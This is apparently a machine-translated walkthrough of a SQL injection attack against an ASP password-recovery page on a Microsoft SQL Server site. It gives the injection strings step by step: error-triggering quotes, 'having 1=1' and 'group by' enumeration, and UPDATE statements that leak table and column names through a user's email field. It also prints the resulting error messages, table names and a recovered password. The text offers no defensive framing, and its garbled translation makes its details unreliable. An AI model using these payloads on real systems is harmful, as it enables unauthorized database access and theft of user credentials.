Name and Field Name Getting Application: Test attack. Step 1: Enter single quotes at the input username, display the Microsoft OLE DB Provider for SQL Server Error 80040E14 String, there is no closed quotation. / user/wantpws.asp, line 63 Description No filtered unit quotes and the database is MSSQL. Step 2: Enter a; use master; - Display Microsoft OLE DB Provider for SQL Server Error 80040E21 Multi-step LE DB operation generates an error. If possible, check each OLE DB status value. No work was completed. /user/wantpws.asp, line 63 This shows that there is no permission. Step 3: Enter: a or name like fff%; - Show a user named FFFF. Step 4: Enter ffff and 1 <> (SELECT Count (email) in the username; - Display: Microsoft OLE DB Provider for SQL Server Error 80040E37 Object Name User is invalid. / user/wantpws.asp, line 96 Description Nothing called User, try to be successful, and there is a column called Email. Enter a haVing 1 = 1-- General return, you can directly get a table name and A field name Microsoft OLE DB Provider for SQL Server Error 80040E14 Users.ID is invalid in the selection list because the column is not included in the aggregate function and there is no Group By clause. /user/wantpws.asp, line 63 Now we know that the password for the FFFF user is 11111. The following is obtained by the statement to get all the table names and field names in the database. Step 5: Enter: fff; update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) where name = fff; - Description: The above statement is the first in the database A user table and put the table name in the mailbox field of the FFFF user.
By looking at the user information of FFFF, you can get the first table called Adware and get the idffff; Update [users] set email = (Select Top 1 id from sysobjects where xtype = u and name = ad) Where xtype = u and name = ad) Where Name = fff; - Item Also Item Id is: 581577110 Since the object flag ID is based on the small to large arrangement so we can get the name of all the user tables, the name of the second table is available for the name of the second table. update [users] set email = (select top 1 name from sysobjects where xtype = u and id> 581577110) where name = ffff; - ad 581577110users 597577167buy 613577224car 629577281learning 645577338log 661577395movie 677577452movieurl 693577509password 709577566type 725577623talk after a period of guessing above we get The analysis should understand Password, users are the best step six steps: guess the field of important tables: Now look at what field ffff; update [users] set email = (SELECT TOP 1 col_name (Object_ID Users), 3) WHERE Name = fff; - Get the third field is Passwordffff; Update [users] set email = (Select Top 1 Col_name (Object_ID (Users), 4) WHERE Name = FFFF Received the fourth field is the field of Name last UserS table a total of 28 full (Note: another way to get fields, the premise is the return error message of the system a group by id haVing 1 = 1 - get Microsoft OLE DB Provider for SQL Server Error 80040E14 Columns Users.UserID is invalid in the selection list because the column is neither included in the aggregate function, nor included in the group BY clause. /User/wantpws.asp , Line 63 This second field is UserID to display the third field. a Group By ID, Userid Having 1 = 1-- Microsoft OLE DB Provider for SQL Server Error 80040E14 Column Users.password is invalid in the selection list, because the column is neither included in the aggregate function, nor included in Group By clause in. /user/wantpws.asp, line 63 Get the PASSWORD, which has always been displayed.